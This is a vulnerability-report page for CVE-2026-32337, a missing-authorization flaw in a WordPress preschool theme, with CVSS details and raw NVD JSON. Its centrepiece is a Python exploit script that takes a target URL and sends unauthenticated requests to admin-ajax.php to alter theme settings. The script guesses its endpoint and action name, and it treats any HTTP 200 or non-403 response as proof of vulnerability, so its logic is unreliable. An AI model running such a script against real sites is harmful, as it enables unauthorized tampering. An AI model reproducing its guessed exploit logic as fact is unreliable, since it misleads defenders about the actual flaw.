Security Vulnerability Report
中文
CVE-2026-32337 CVSS 5.3 MEDIUM

CVE-2026-32337

Published: 2026-03-13 19:54:44
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Preschool and Kindergarten preschool-and-kindergarten allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Preschool and Kindergarten: from n/a through <= 1.2.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

raratheme Preschool and Kindergarten Theme <= 1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32337 PoC - Missing Authorization in Preschool and Kindergarten Theme # This PoC demonstrates accessing protected functionality without proper authorization import requests import sys def check_vulnerability(base_url): """ Check if the target WordPress site is vulnerable to CVE-2026-32337 """ # Common endpoints that might be affected endpoints = [ f"{base_url}/wp-admin/admin-ajax.php", f"{base_url}/wp-json/wp/v2/", ] vulnerable = False for endpoint in endpoints: try: # Try accessing without authentication response = requests.get(endpoint, timeout=10) # Check for signs of unauthorized access if response.status_code == 200: # Check for theme-specific endpoints or data if 'preschool' in response.text.lower() or 'kindergarten' in response.text.lower(): print(f"[+] Potential unauthorized access detected at: {endpoint}") vulnerable = True elif response.status_code != 403: print(f"[*] Endpoint accessible without auth: {endpoint}") vulnerable = True except requests.RequestException as e: print(f"[-] Error checking {endpoint}: {e}") return vulnerable def exploit_theme_settings(base_url): """ Attempt to modify theme settings without authorization """ # Common theme option update endpoint pattern target_url = f"{base_url}/wp-admin/admin-ajax.php" # Typical theme settings update parameters data = { 'action': 'theme_settings_update', # Common action name pattern 'option_name': 'preschool_settings', } try: response = requests.post(target_url, data=data, timeout=10) if response.status_code == 200: print(f"[!] Request accepted - may indicate missing authorization check") print(f"Response: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Exploit error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-32337.py <target_url>") print("Example: python cve-2026-32337.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Checking target: {target}") print(f"[*] Vulnerability: CVE-2026-32337 - Missing Authorization in Preschool and Kindergarten Theme") if check_vulnerability(target): print("[+] Target appears to be vulnerable") exploit_theme_settings(target) else: print("[-] Target does not appear to be vulnerable or theme not installed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32337", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:44.493", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Preschool and Kindergarten preschool-and-kindergarten allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Preschool and Kindergarten: from n/a through <= 1.2.5."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en raratheme Preschool and Kindergarten preschool-and-kindergarten permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Preschool and Kindergarten: desde n/a hasta &lt;= 1.2.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/preschool-and-kindergarten/vulnerability/wordpress-preschool-and-kindergarten-theme-1-2-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}